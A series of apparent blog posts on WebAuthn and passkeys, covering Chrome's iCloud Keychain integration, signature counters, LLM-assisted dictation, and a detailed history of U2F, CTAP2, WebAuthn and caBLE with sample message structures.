A Tour of WebAuthn

I've done a bunch of posts about WebAuthn/passkeys over time. This year I decided to flesh them out a bit into a longer work on understanding and using WebAuthn. If you were at the FIDO conference in Carlsbad this year, you may have received a physical, printed booklet of the result. It took a while to get around to converting to HTML, but the text is now available online.

Let's Kerberos

(I think this is worth pondering, but I don’t mean it too seriously—don’t panic.)

Are the sizes of post-quantum signatures getting you down? Are you despairing of deploying a post-quantum Web PKI? Don’t fret! Symmetric cryptography is post-quantum too!

When you connect to a site, also fetch a record from DNS that contains a handful of “CA” records. Each contains:

“CA-key” is a symmetric key known only to the CA, and “server-CA-key” is a symmetric key known to the server and the CA.

The client finds three of these CA records where the UUID matches a CA that the client trusts. It then sends a message to each CA containing:

The CA can decrypt “client-CA-key” and then it can decrypt “server-CA-key” (from the DNS information that the client sent) using an AAD that’s either the client’s specified hostname, or else that hostname with the first label replaced with *, for wildcard records.

The CA replies with Eserver-CA-key(client-server-key), i.e. the client’s chosen key, encrypted to the server. The client can then start a TLS connection with the server, send it the three encrypted client–server keys, and the client and server can authenticate a Kyber key-agreement using the three shared keys concatenated.

Both the client and server need symmetric keys established with each CA for this to work. To do this, they’ll need to establish a public-key authenticated connection to the CA. So these connections will need large post-quantum signatures, but that cost can be amortised over many connections between clients and servers. (And the servers will have to pass standard challenges in order to prove that they can legitimately speak for a given hostname.)

Some points:

Chrome support for passkeys in iCloud Keychain

Chrome 118 (which is rolling out to the Stable channel now) contains support for creating and accessing passkeys in iCloud Keychain.

Firstly, I’d like to thank Apple for creating an API for this that browsers can use: it’s a bunch of work, and they didn’t have to. Chrome has long had support for creating WebAuthn credentials on macOS that were protected by the macOS Keychain and stored in the local Chrome profile. If you’ve used WebAuthn in Chrome and it asked you for Touch ID (or your unlock password) then it was this. It has worked great for a long time.

But passkeys are supposed to be durable, and something that’s forever trapped in a local profile on disk is not durable. Also, if you’re a macOS + iOS user then it’s very convenient to have passkeys sync between your different devices, but Google Password Manager doesn’t cover passkeys on those platforms yet. (We’re working on it.)

So having iCloud Keychain support is hopefully useful for a number of people. With Chrome 118 you’ll see an “iCloud Keychain” option appear in Chrome’s WebAuthn UI if you’re running macOS 13.5 or later:

An image of the iCloud Keychain option in Chrome's WebAuthn UI

You won’t, at first, see iCloud Keychain credentials appear in autofill. That’s because you need to grant Chrome permission to access the metadata of iCloud Keychain passkeys before it can display them. So the first time you select iCloud Keychain as an option, you’ll see this:

An image of the macOS passkeys permission dialog

If you accept, then iCloud Keychain credentials will appear in autofill, and in Chrome’s account picker when you click a button to use passkeys. If you decline, then you won’t be asked again. You can still use iCloud Keychain, but you’ll have to go though some extra clicks every time.

You can change your mind in System Settings → Passkeys Access for Web Browsers, or you can run tccutil reset WebBrowserPublicKeyCredential from a terminal to reset that permission system wide. (Restart Chrome after doing either of those things.)

Saving a passkey in iCloud Keychain requires having an iCloud account and having iCloud Keychain sync enabled. If you’re missing either of those, the iCloud Keychain passkey UI will prompt you to enable them to continue. It’s not possible for a regular process on macOS to tell whether iCloud Keychain syncing is enabled, at least not without gross tricks that we’re not going to try. The closest that we can cleanly detect is whether iCloud Drive is enabled. If it is, Chrome will trigger iCloud Keychain for passkey creation by default when a site requests a “platform” credential in the hope that iCloud Keychain sync is also enabled. (Chrome will default to iCloud Keychain for passkey creations on accounts.google.com whatever the status of iCloud Drive, however—there are complexities to also being a password manager.)

If you opt into statistics collection in Chrome, thank you, and we’ll be watching those numbers to see how successful people are being in aggregate with this. If the numbers look reasonable, we may try making iCloud Keychain the default for more groups of users.

If you don’t want creation to default to iCloud Keychain, there’s a control in chrome://password-manager/settings:

An image of Chrome settings

I’ve described above how things are a little complex, but the setting is just a boolean. So, if you’ve never changed it, it reflects an approximation of what Chrome is doing. But if you set it, then every case will respect that. The enterprise policy CreatePasskeysInICloudKeychain controls the same setting if you need to control this fleet-wide.

With macOS 14, other password managers are able to provide passkeys into the system on macOS and iOS. This iCloud Keychain integration was written prior to Chromium building with the macOS 14 SDK so, if you happen to install such a password manager on macOS 14, its passkeys will be labeled as “iCloud Keychain” in Chrome until we can do another update. Sorry.

Signature counters

If you look at the structure of the signed messages in WebAuthn you’ll notice that one of the fields is called the “signature counter”. In the previous long post I said to ignore it, which is still correct, but here’s why.

Signature counters are optional for the authenticator to implement: it’s valid for a security key not to have a signature counter, although the vast majority of them do. In that case, the counter value is always zero. But once a website has seen a non-zero value, then the security key has to ensure that the counter, for all future assertions from a given credential, is strictly increasing.

The motivation of the signature counter is that it might allow websites to detect when a security key has been cloned. Cloning a security key is supposed to be very difficult. At the very least, you should need physical access to it, and hopefully you need to spend a substantial amount of time invasively interrogating it. But, if you assume all that happened, then one could clone a security key (probably destroying it in the process), get the private key of a credential out of it, and create a working replica which could be slipped back into the possession of the legitimate user, leaving them unaware that anything has happened. At this point, the attacker can create assertions at will because they know the credential’s private key.

If all that has happened, then the signature counter might uncover it. Unless the attacker can know exactly when the legitimate user has created an assertion, and thus incremented the counter, then eventually either they or the real user will create an assertion where the counter didn’t increase.

You might be able to tell, but I consider this a rather far-fetched scenario. Nevertheless, if a website wants to use the signature counters, then it must treat any non-incrementing counter as a signal to lock the account and trigger an investigation. At a minimum, the security key in question should be replaced. Simply rejecting the assertion is meaningless: the attacker will just increment the counter and try again, and a regular user will assume that it’s some temporary glitch and do the same.

However, where I’ve seen sites bothering to check the signature counter, they’ve always just treated it as a transient error. And I’ve never heard of a signature counter actually being used to catch an attack.

On the other hand, many security keys only have a single, global signature counter, and this allows different websites to correlate the use of the same security key between them. That is, the current counter value of your security key is somewhat identifying and can be combined with information about how often you use it. For that reason, some security keys implement more granular signature counters, and good for them, but I consider it rather a waste.

When passkeys are synced between machines, they never implement signature counters because that would require that the set of machines maintain a coherent value. So, over time, you’ll probably observe that the majority of credentials don’t have them.

Voice recognition

Update: Evan let me know that Whisper solved the voice recognition problem. He has a wrapper that records from a microphone and prints the transcription here. Whisper is very impressive and the only caveat is that it sometimes inserts whole fabricated sentences at the end. The words always sort of make sense in context, but there were no sounds that could possibly have caused it. It's always at the very end in my experience, and it's no problem to remove it so, with that noted, you should ignore everything below because Whisper is a better answer.

Last week’s blog post was rather long, and had a greater than normal number of typos. (Thanks to people who pointed them out. I think I’ve fixed all the ones that were reported.)

This was because I saw in reviews that iOS 17’s voice recognition was supposed to be much improved, and I figured that I’d give it a try. I’ve always found iOS’s recognition to be superior to Google Docs and I have an old iPad Pro that’s good for betas.

iOS’s performance remains good and, yes, I think it’s better than iOS 16. But it’s still hardly at the level of “magic”, especially when using technical terms. Here’s a paragraph taken directly from the raw output of last week’s post (I’ve highlighted errors with italics):

It is integrated into the W3C credential management specification and so it is called via navigator . credentials . create and navigator .credentials. get. This document is about understanding the deeper structures that underpin web orphan rather than being a guy as to its details. So we will leave a great many details to the numerous guides to Web Oran that already exist on the web and instead focus on how structures from UF were carried over into Web orphan and updated.

While it’s nice that many of the words are there, with that density of errors doing all the corrections means that it’s not clearly better than typing things out. However, the world is all aflutter about LLMs these days. Can they help?

I wrote a script to chunk paragraphs of text so that the chunks were at least 500 bytes, and then to send them to gpt-3.5-turbo with the following instructions prefixed, and a temperature of 0.6:

The following is the output of a poor speech recognition system. Please correct its errors and reply with the corrected version without any preamble. Some of the uncommon words that the system can’t recognise are U2F, CTAP, FIDO, CTAP2, JSON, FIDO2, WebAuthn, bearer token, hash, phishing, RP ID, passkey, caBLE, and password manager.

Here’s the cleaned up version of that paragraph.

It is integrated into the W3C credential management specification and so it is called via navigator.credentials.create and navigator.credentials.get. This document is about understanding the deeper structures that underpin web authentication rather than being a guide as to its details. So we will leave a great many details to the numerous guides to WebAuthn that already exist on the web and instead focus on how structures from U2F were carried over into WebAuthn and updated.

There’s one case where it wrote “web authentication” rather than “WebAuthn”, but it fixed all the other problems!

So that’s what I tried: I dictated long chunks to iOS, then ran a script to clean it up with GPT, then edited it manually in Obsidian. From Obsidian, pandoc converted to HTML and EPUB formats.

That prompt is the result of some experimentation. Initially, I asked GPT to fix “errors and grammar” but, when reading the results, some sentences were incorrect and I found that it had “fixed” them into nonsense. Therefore I dropped “and grammar”. You can ask it to output in Markdown format, and I probably should have done that, but I was too far into manual editing by the time that I thought of it.

An oddity was that I wrote the instructions with the word “recognise” (English spelling) but then thought that it might work better with the more common American spelling (“recognize”). But that seemed to make it worse!

An obvious thing to try was to use GPT 4. However, I misread the costs of OpenAI’s API and thought that their charges were per-token, not per 1000 tokens. So with estimates that were off by three orders of magnitude, GPT 4 seemed a bit too expensive for a random experiment and I used GPT 3.5 for everything.

I didn’t write this post the same way, but this experimental worked well enough that I might try it again in the future for longer public writing.

From U2F to passkeys

(This post is nearing 8 000 words. If you want to throw it onto an ereader there's an EPUB version too.)

Introduction

Over more than a decade, a handful of standards have developed into passkeys—a plausible replacement for passwords. They picked up a lot of complexity on the way, and this post tries to give a chronological account of the development of the core of these technologies. Nothing here is secret; it’s all described in various published standards. However, it can be challenging to read these standards and understand how it’s meant to fit together.

The beginning: U2F

U2F stands for “Universal Second Factor”. It was a pair of standards, one for computers to talk to small removable devices called security keys, and the second a JavaScript API for websites to use them. The first standard of the pair is also called the Client to Authenticator Protocol (CTAP1), and when the term “U2F” is used in isolation, it usually refers to that. The JavaScript API, now obsolete, was generally referred to as the “U2F API”.

The goal of U2F was to eliminate “bearer tokens” in user authentication. A “bearer token” is a term of art in authentication that refers to any secret that is passed around to prove identity. A password is the most common example of such a secret. It’s a bearer token because you prove who you are by disclosing it, on the assumption that nobody else knows the secret. Passwords are not the only bearer tokens involved in computer security by a long way—the infamous cookies that all web users are constantly bothered about are another example. But U2F was focused on user authentication, while cookies identify computers, so U2F was primarily trying to augment passwords.

The problem with bearer tokens is that to use them, you have to disclose them. And knowledge of the token is how you prove your identity. So every time you prove your identity, you are handing another entity the power to impersonate you. Hopefully, the other entity is the intended counterparty and so would gain nothing from impersonating you to itself. But websites are very complicated counterparties, made up of many different parts, any one of which could be compromised to leak these tokens.

Digital signatures are preferable to bearer tokens because it’s possible to prove possession of a private key, using a signature, without disclosing that private key. So U2F allowed signatures to be used for authentication on the web.

While U2F is generally obsolete these days, it defined the core concepts that shaped how everything that came after it worked. (And there remain plenty of U2F security keys in use.) It’s also the clearest demonstration of those concepts, before things got more complex, so we’ll cover it in some detail although the following sections will use modern terminology where things have been renamed, so you’ll see different names if you look at the U2F specs.

Creating a credential

CTAP1 only includes two different commands: one to create a credential and one to get a signature from a credential. Websites make requests using the U2F JavaScript API and the browser translates them into CTAP1 commands.

Here’s the structure of the CTAP1 request for creating a credential:

Offset Size Meaning
0 1 Command code, 0x01 to register
1 2 Flags, always zero
3 2 Length of following data, always 64
5 32 SHA-256 hash of client data
37 32 SHA-256 hash of AppID

There are two important inputs here: the two hashes. The first is the hash of the “client data”, a JSON structure built by the browser. The security key includes this hash in its signed output and it’s what allows the browser (or operating system) to put data into the signed message. The JSON is provided to the website by the browser and can include a variety of things, but there are two that are worth highlighting:

Firstly, the origin that made the JavaScript call. (An origin is the protocol, hostname, and port number of a URL.) This allows the website’s server to know what origin the user was interacting with when they were using their security key, and that allows it to stop phishing attacks by rejecting unknown origins. For example, if all sign-in and account actions are done on https://accounts.example.com, then the server needs to permit that as a valid origin. But, by rejecting all other origins, phishing attacks are easily defeated.

When used outside of a web context, for example by an Android app, the “origin” will be a special URL scheme that includes the hash of the public key that signed the app. If a backend server expects users to be signing in with an app, then it must recognize that app as a valid origin value too. (You might see in some documentation that there’s an iOS scheme similarly defined but, in fact, iOS incorrectly puts a web origin into the JSON string even when the request comes from an app.)

The second value from the client data worth highlighting is called the “challenge”. This value is provided by the website and it’s a large random number. Large enough that the website that created it can be sure that any value derived from it must have been created afterwards. This ensures that any reply derived from it is “fresh” and this prevents replay attacks, where an old response is repeated and presented as being new.

There are other values in the JSON string too (e.g. the type of the message, to provide domain separation), but they’re peripheral to this discussion.

Now we’ll discuss the second hash in the request: the AppID hash. The AppID is specified by the website and its hash is forever associated with the newly created credential. The same value must be presented every time the credential is used.

A privacy goal of U2F and the protocols that followed it was to prevent the creation of credentials that span websites, and thus could be a form of “super cookie”. So the AppID hash identifies the site that created a credential and, if some other site tries to use it, it prevents them from doing so. Clearly, to be effective, the browser has to limit what AppIDs a website is allowed to use—otherwise all websites could just decide to use the same AppID and share credentials!

U2F envisioned a process where browsers could fetch the AppID (which is a URL) and parse a JSON document from it that would list other sorts of entities, like apps, that would be allowed to use an AppID. But in practice, I don’t believe any of the browsers ever implemented that. Instead, a website was allowed to use an AppID if the host part of the AppID could be formed by removing labels from the website’s origin without hitting an eTLD. That was a complicated sentence, but don’t worry about it for now. AppIDs are defunct, and we will cover this logic in more detail when we discuss their replacement in a later section.

What you should take away is that credentials have access controls, so that websites can only use their own credentials. This happens to stop most phishing attacks, but that’s incidental: the hash of the JSON from the browser is what is supposed to stop phishing attacks. Rather, the AppID should be seen as a constraint on websites.

Given those inputs, the security key generates a new credential, consisting of an ID and public–private key pair.

Registration errors

Assuming that the request is well-formed, there is only one plausible error that the security key can return, but it happens a lot! The error is called “test of user presence required”. It means that a human needs to touch a sensor on the security key. U2F was designed so that security keys could be implemented in a Java-based framework that did not allow requests to block, so the computer is expected to repeatedly send requests and, if they result in this error, to wait a short amount of time and to send them again. Security keys will generally blink an LED while the stream of requests is ongoing, and that’s a signal to the user to physically touch the security key. If a touch was registered within a short time before the request was received, then the request will be processed successfully.

This shows “user presence”, i.e. that some human actually authorised the operation. Security keys don’t (generally) have a trusted display that says what operation is being performed, but this check does stop malware from getting the security key to perform operations silently.

The registration response

Here’s what comes back from a U2F security key after creating a credential:

Offset Size Meaning
0 1 Reserved, always has value 0x05
1 65 Public key (uncompressed X9.62)
66 1 Length of credential ID (“L”)
67 variable Credential ID
67 + L variable X.509 attestation certificate
variable variable ECDSA signature

The public key field is hopefully pretty obvious: it’s the public key of the newly created credential. U2F always uses ECDSA with P-256 and SHA-256, and a P-256 point in uncompressed X9.62 format is 65 bytes long.

Next, the credential ID is an opaque identifier for the credential (although we will have more to say about it later).

Then comes the attestation certificate. Every U2F security key has an X.509 certificate that (usually) identifies the make and model of the security key. The private key corresponding to the certificate is embedded within the security key and, hopefully, is hard to extract. Every new credential is signed by this attestation certificate to attest that it was created within a specific make and model of security key.

But a unique attestation certificate would obviously become a tracking vector that identifies a given security key every time it creates a credential! Since we don’t want that, the same attestation certificate is used in many security keys and manufacturers are supposed to use the same certificate for batches of at least 100,000 security keys.

Finally, the response contains the signature, from that attestation certificate, over several fields of the request and response.

Note that there’s no self-signature from the credential. That was probably a mistake in the design, but it’s a mistake that is still with us today. In fact, if you don’t check the attestation signature then nothing is signed and you needn’t have bothered with the challenge parameter at all! That’s why you might see a challenge during registration being set to a single zero byte or other such placeholder value.

Statelessness

The vast majority (probably all?) U2F security keys don’t actually store anything when they create a credential. The credential ID that they return is actually an encrypted seed that allows the security key to regenerate the private key as needed. So the security key has a single root key that it uses to encrypt generated seeds, and those encrypted seeds are the credential IDs. Since you always need to send the credential ID to a U2F security key when getting a signature from it, no per-credential storage is necessary.

The key handle won’t just be an encryption of the seed because you want the security key to be able to ignore key handles that it didn’t generate. Also, the AppID hash needs to be mixed into the ciphertext somehow so that the security key can check it. But any authenticated encryption scheme can manage these needs.

Whenever you reset a stateless security key, it just regenerates its root key, thus invalidating all previous credentials.

Getting assertions

An “assertion” is a signature from a credential. Like we did when we covered credential creation, let’s look at the structure of a CTAP1 assertion request because it still carries the core concepts that we see in passkeys today:

Offset Size Meaning
0 1 Command code, 0x02 to get an assertion
1 2 Flags: 0x0700 for “check-only”, 0x0300 otherwise
3 2 Length of following data
5 32 SHA-256 hash of Client Data
37 32 SHA-256 hash of AppID
69 1 Length of credential ID (“L”)
70 variable Credential ID

We already know what the client data and AppID hashes are. (Although this time you definitely need a random challenge in the client data!)

The security key will attempt to decrypt the credential ID and authenticate the AppID hash. If unsuccessful, perhaps because the credential ID is from a different security key, it will return an error. Otherwise, it will check to see whether its touch sensor has been touched recently and, if so, it will return the requested assertion. (If the touch sensor hasn’t been triggered then the platform does the same polling as when creating a credential, as detailed above.)

The bytes signed by an assertion look like this:

Offset Size Meaning
0 32 SHA-256 hash of the AppID
32 1 0x1 if user-presence was confirmed, zero otherwise
33 4 Signature counter
37 32 SHA-256 hash of the Client Data

The signature covers the client data hash, and thus it covers the challenge from the website. So the website can be convinced that it is a fresh signature from the security key. Since the client data also includes the origin, the website can check that the user hasn’t been phished.

There’s also a “signature counter” field. All you need to know is that you should ignore it—the field will generally be zero these days anyway.

Transports

Most security keys are USB devices. They appear on the USB bus as a Human Interface Device (HID) and they have a special usage-page number to identify themselves.

NFC capable security keys are also quite common and frequently offer a USB connection too. When using the security key via NFC, the touch sensor isn’t used. Merely having the security key in the NFC field is considered to satisfy user presence.

There are also Bluetooth security keys. They work over the GATT protocol and their major downside is that they need a battery. For a long time, Bluetooth security keys were the only way to get a security key to work with iOS, but since iOS added native support, they’ve become much less common. (And Yubico now makes a security key with a Lightning connector.)

Connecting U2F to the web

FIDO defined a web API for U2F. I’m not going to go into the details because it’s obsolete now (and Chromium never actually implemented it, instead shipping an internal extension that sites could communicate with via postMessage), but it’s important to understand how browsers translated requests from websites into U2F commands because it’s still the core of how things work now.

When registering a security key, a website could provide a list of already registered credential IDs. The idea was that the user should not mistakenly register the same security key twice, so any security key that recognised one of the already known credential IDs should not be used to complete the registration request.

Browsers implement this by sending a series of assertion requests to each security key to see whether any of the credential IDs are valid for them. That’s why there’s a “check only” mode in the assertion request: it causes the security key to report whether the credential ID was recognised without requiring a touch.

When Chrome first implemented U2F support, any security keys excluded by this check were ignored. But this meant that they never flashed and users found that confusing—they assumed that the security key was broken. So Chrome started sending dummy registration requests to those security keys, which made them flash. If the user touched them, the created credential would be discarded. (That was presumably a strong incentive for U2F security keys to be stateless!)

When signing in, a site sends a list of known credential IDs for the current user. The browser sends a series of “check only” requests to the security keys until it finds a credential recognised by each key. Then it repeatedly sends a normal request for that credential ID until the user touches a security key. The security key that the user touches first “wins” and that assertion is returned to the website.

The need for the website to send a list of credential IDs determines the standard U2F sign-in experience: the user enters their username and password and, if recognised, then the site asks them to tap their security key. A desire to move away from this model motivated the development of the next iteration of the standards.

FIDO2

The U2F ecosystem described above satisfied the needs of second-factor authentication. But that doesn’t get rid of passwords: you still have to enter your password first and then use your security key. If passwords were to be eliminated, more was needed. So an effort to develop a new security key protocol, CTAP2, was started.

Concurrent with the development of CTAP2, an updated web API was also started. That ended up moving to the W3C (the usual venue for web standards) and became the “Web Authentication” spec, or WebAuthn for short.

Together, CTAP2 and WebAuthn constituted the FIDO2 effort.

Discoverable credentials

U2F credentials are called “non-discoverable”. This means that, in order to use them, you have to know their credential ID. “Discoverable” credentials are ones that a security key can find by itself, and thus they can also replace usernames.

A security key with discoverable credentials must dedicate storage for each of them. Because of this, you sometimes see discoverable credentials called “resident credentials”, but there is a distinction between whether the security key keeps state for a credential vs whether it’s discoverable. A U2F security key doesn’t have to be stateless, it could keep state for every credential, and its credential IDs could simply be identifiers. But those credentials are still non-discoverable if they can only be used when their credential ID is presented.

With discoverable credentials comes the need for credential metadata: if the user is going to select their account entirely client-side, then the client needs to know something like a username. So in the FIDO2 model, each credential gets three new pieces of metadata: a username, a user display name, and a user ID. The username is a human-readable string that uniquely identifies an account on a website (it often has the form of an email address). The user display name can be a more friendly name and might not be unique (it often has the form of a legal name). The user ID is an opaque binary identifier for an account.

The user ID is different from the other two pieces of metadata. Firstly, it is returned to the website when signing in, while the other metadata is purely client-side once it has been set. Also, the user ID is semantically important because a given security key will only store a single discoverable credential per website for a given user ID. Attempting to create a second discoverable credential for a website with a user ID that matches an existing one will cause the existing one to be overwritten.

Storing all this takes space on the security key, of course. And, if your security key needs to be able to run within the tight power budget of an NFC device, space might be limited. Also, the interface to manage discoverable credentials didn’t make it into CTAP 2.0 and had to wait for CTAP 2.1, so some early CTAP2 security keys only let you erase discoverable credentials by resetting the whole key!

User verification

You probably don’t want somebody to be able to find your lost security key and sign in as you. So, to replace passwords, security keys are going to have to verify that the correct user is present, not just that any user is present.

So, FIDO2 has an upgraded form of user presence called “user verification”. Different security keys can verify users in different ways. The most basic method is a PIN entered on the computer and sent to the security key. The PIN doesn’t have to be numeric—it can include letters and other symbols too—one might even call it a password if the aim of FIDO wasn’t to replace passwords. But, whatever you call it, it is stronger than typical password authentication because the secret is only sent to the security key, so it can’t leak from some far away password database, and the security key can enforce a limited number of attempts to guess it.

Some security keys do user verification in other ways. They can incorporate a fingerprint reader, or they can have an integrated PIN pad for more secure PIN entry.

RP IDs

FIDO2 replaces AppIDs with “relying party IDs” (RP IDs). AppIDs were URLs, but RP IDs are bare domain names. But otherwise, RP IDs serve the same purpose as AppIDs did in CTAP1.

We only briefly covered the rules for which websites can set which AppIDs before because AppIDs are obsolete, but it’s worth covering the rules for RP IDs in detail because of how important they are in deployments.

A site may use any RP ID formed by discarding zero or more labels from the left of its domain name until it hits an eTLD. So say that you’re https://www.foo.co.uk: you can specify an RP ID of www.foo.co.uk (discarding zero labels), foo.co.uk (discarding one label), but not co.uk because that’s an eTLD. If you don’t set an RP ID in a request then the default is the site’s full domain.

Our www.foo.co.uk example might happily be creating credentials with its default RP ID but later decide that it wants to move all sign-in activity to an isolated origin, https://accounts.foo.co.uk. But none of the passkeys could be used from that origin! The site would have needed to create them with an RP ID of foo.co.uk from the beginning to allow that.

So it’s important to carefully consider your RP ID from the outset. But the rule is not to always use the most general RP ID possible. Going back to our example, if usercontent.foo.co.uk existed, then any credentials with an RP ID of foo.co.uk could be overwritten by pages on usercontent.foo.co.uk. We can assume that foo.co.uk is checking the origin of any assertions, so usercontent.foo.co.uk can’t use its ability to set an RP ID of foo.co.uk to generate valid assertions, but it can still try to get the user to create new credentials which could overwrite the legitimate ones.

CTAP protocol changes

In addition to the high-level semantic changes outlined above, the syntax of CTAP2 is thoroughly different from the U2F. Rather than being a binary protocol with fixed or ad-hoc field lengths, it uses CBOR. CBOR, when reasonably subset, is a MessagePack-like encoding that can represent the JSON data model in a compact binary format, but it also supports a bytestring type to avoid having to base64-encode binary values.

CTAP2 replaces the polling-based model of U2F with one where a security key would wait to process a request until it was able. It also tried to create a model where the entire request would be sent by the platform in a single message, rather than having the platform iterate through credential IDs to find ones that a security key recognised. However, due to limited buffer sizes of security keys, this did not work out: the messages could end up too large, especially when dealing with large lists of credential IDs, so many requests will still involve multiple round trips between the computer and the security key to process.

While I’m not going to cover CTAP2 in any detail, let’s have a look at a couple of examples. Here’s a credential creation request:

{
  # SHA-256 hash of client data
  1: h'60EACC608F20422888C8E363FE35C9544A58B8920989D060021BC30F7323A423',
  # RP ID and friendly name of website
  2: {
    "id": "webauthn.io",
    "name": "webauthn.io"
  },
  3: {
    # User ID
    "id": h'526E4A6C5A41',
    # Username
    "name": "Fred",
    # User Display Name
    "displayName": "Fred"
  },
  4: [
    # ECDSA with P-256 is acceptable to the website
    {"alg": -7, "type": "public-key"},
    # And so is RSA.
    {"alg": -257, "type": "public-key"}
  ],
  # Create a discoverable credential.
  7: {"rk": true},
  # A MAC showing that the user has entered the correct PIN and thus
  # This request has verified the user with "PIN protocol" v1.
  8: h'4153542771C1BF6586718BCD0ECA8E96', 9: 1
}

CBOR is a binary format, but it defines a diagnostic notation for debugging, and that’s how we’ll present CBOR messages here. If you scan down the fields in the message, you’ll see similarities and differences with U2F:

Likewise, here’s an assertion request:

{
  # RP ID of the requesting website.
  1: "webauthn.io",
  # Hash of the client data
  2: h'E7870DBBA212581A536D29D38831B2B8192076BAAEC76A4B34918B4222B79616',
  # List of credential IDs
  3: [
    {"id": h'D64875A5A7C642667745245E118FCD6A', "type": "public-key"}
  ],
  # A MAC showing that the user has entered the correct PIN and thus
  # This request has verified the user with "PIN protocol" one.
  6: h'6459AF24BBDA323231CF42AECABA51CF', 7: 1
}

Again, it’s structurally similar to the U2F request, except that the list of credential IDs is included in the request rather than having the computer poll for each in turn. Since the credential that we created was discoverable, critically that list could also be empty and the request would still work! That’s why discoverable credentials can be used before a username has been entered.

With management of discoverable credentials, fingerprint enrollment, enterprise attestation support, and more, CTAP2 is quite complex. But it’s a very capable authentication ecosystem for enterprises and experts.

WebAuthn

As part of the FIDO2 effort, the WebAuthn API was completely replaced. If you recall, the U2F web API was not a W3C standard, and it was only ever implemented in Chromium as a hidden extension. The replacement, called WebAuthn, is a real W3C spec and is now implemented in all browsers.

It is substantially more complicated than the old API!

WebAuthn is integrated into the W3C credential management specification and so it is invoked in JavaScript via navigator.credentials.create and navigator.credentials.get. This document is about understanding the deeper structures that underpin WebAuthn rather than being a guide to its details. So we’ll leave them to the numerous tutorials that already exist on the web and instead focus on how structures from U2F were carried over into WebAuthn and updated.

Firstly, we’ll look at the structure of a signed assertion in WebAuthn.

Offset Size Meaning
0 32 SHA-256 hash of the RP ID
32 1 Flags
33 4 Signature counter
37 varies CBOR-encoded extension outputs
37 32 SHA-256 hash of the client data

It should look familiar because it’s a superset of the CTAP signed message format. This was chosen deliberately so that U2F security keys would function with WebAuthn. This wasn’t a given—there were discussions about whether it should be a fresh start–but ultimately there were lots of perfectly functional U2F security keys out in the world, and it seemed too much of a shame to leave them behind.

But there are changes in the details. Firstly, what was the AppID hash is now the RP ID hash. We discussed RP IDs above and, importantly, the space of AppIDs and the space of RP IDs is distinct. So since U2F security keys compare the hashes of these strings, no credential registered with the old U2F API could function with WebAuthn. From the security keys’ perspective, the hash is incorrect and so the credential can’t be used. Some complicated workarounds were needed for this, which we will touch on later.

The other changes in the assertion format come from defining additional flag bits and adding an extensions block. The most important new flag bit is the one that indicates that user verification was performed in an assertion. (WebAuthn and CTAP2 were co-developed, and so the new concept of user verification from the latter was exposed in the former.)

The extensions block was added to make the assertion format more flexible. While U2F’s binary format was pleasantly simple, it was difficult to change. Since CTAP2 was embracing CBOR throughout, it made sense that security keys be able to return any future fields that needed to be added to the assertion in CBOR format.

Correspondingly, an extension block was added into the WebAuthn requests too (although those are JavaScript objects rather than CBOR). The initial intent was that browsers would transcode extensions into CBOR, send them to the authenticator, and the authenticator could return the result in its output. However, exposing arbitrary and unknown functionality from whatever USB devices were plugged into the computer to the open web was too much for browsers, and no browser ever allowed arbitrary extensions to be passed through like that. Nonetheless, several important pieces of functionality have been implemented via extensions in the subsequent years.

The first major extension was a workaround for the transition to RP IDs mentioned above. The appid extension to WebAuthn allowed a website to assert a U2F AppID when requesting an assertion, so that credentials registered with the old U2F API could still be used. Similarly, the appidExclude extension could specify an AppID in a WebAuthn registration request so that a security key registered under the old API couldn’t be accidentally registered twice.

Overall, the transition to RP IDs probably wasn’t worth it, but we’ve done it now so it’s only a question of learning for the future.

Extensions in the signed response allow the authenticator to add extra data into the response, but the last field in the signed message, the client data hash, is carried over directly from U2F and remains the way that the browser/platform adds extra data. It gained some more fields in WebAuthn:

dictionary CollectedClientData {
    required DOMString           type;
    required DOMString           challenge;
    required DOMString           origin;
    DOMString                    topOrigin;
    boolean                      crossOrigin;
};

The centrally-important origin and challenge are still there, and type for domain separation, but the modern web is complex and often involves layers of iframes and so some more fields have been added to ensure that backends have a clear and correct picture of where the purposed sign-in is happening.

Other types of authenticator

Until now, we have been dealing only with security keys as authenticators. But WebAuthn does not require that all authenticators be security keys. Although aspects of CTAP2 poke through in the WebAuthn data structures, anything that formats messages correctly can be an authenticator, and so laptops and desktops themselves can be authenticators.

These devices are known as “platform authenticators”. At this point in our evolution, they are aimed at a different use case than security keys. Security keys are called “cross-platform authenticators” because they can be moved between devices, and so they can be used to authenticate on a brand-new device. A platform authenticator is for when you need to re-authenticate a user, that is, to establish that the correct human is still behind the keyboard. Since we want to validate a specific human, platform authenticators must support user verification to be useful for this.

And so there is a specific feature detection function called isUserVerifyingPlatformAuthenticatorAvailable (usually shortened to “isUVPAA” for obvious reasons). Any website can call this and it will return true if there is a platform authenticator on the current device that can do user verification.

The majority of WebAuthn credentials are created on platform authenticators now because they’re so readily available and easy to use.

caBLE / hybrid

While platform authenticators were great for reauthenticating on the same computer, they could never work for signing in on a different computer. And the set of people who were going to go out and buy security keys was always going to be rather small. So, to broaden the reach of WebAuthn, allowing people to use their phones as authenticators was an obvious step.

CTAP over BLE was already defined, but Bluetooth pairing was an awkward and error-prone process. Could we make phones usable as authenticators without it?

The first attempt was called cloud-assisted BLE (caBLE) and it involved the website and the phone having a shared key. A WebAuthn extension allowed the website to request that a computer start broadcasting a byte string over BLE. The idea was that the phone would be listening for these BLE adverts, would trial decrypt their contents against the set of shared keys it knew about, and (if it found a match) it would start advertising in response. When the computer saw a matching reply, it would make a Generic Attribute Profile (GATT) connection to that phone, do encryption at the application level, and then CTAP could continue as normal, all without having to do Bluetooth pairing.

This was launched as a feature specific to accounts.google.com and Chrome. For several years you could enable “Phone as a Security Key” for your Google account and it did something like that. But, despite a bunch of effort, there were persistent problems:

Firstly, listening for Bluetooth adverts in the background was difficult in the Android ecosystem. To work around this, accounts.google.com would send a notification to the phone over the network to tell it when to start listening. This was fine for accounts.google.com, but most websites can’t do that.

Second, the quality of Bluetooth hardware in desktops varies considerably, and getting a desktop to send more than one BLE advert never worked well. So you could only have one phone enrolled for this service, per account.

Lastly, but most critically, BLE GATT connections were just too unreliable. Even after a considerable amount of work to try and debug issues, the most reliable combination of phone and desktop achieved only 95% connection success—and that’s after the two devices had managed to exchange BLE adverts. In common configurations, the success rate was closer to 80% and it would randomly fail even for the people developing it. So despite trying for years to make this design work, it had to be abandoned.

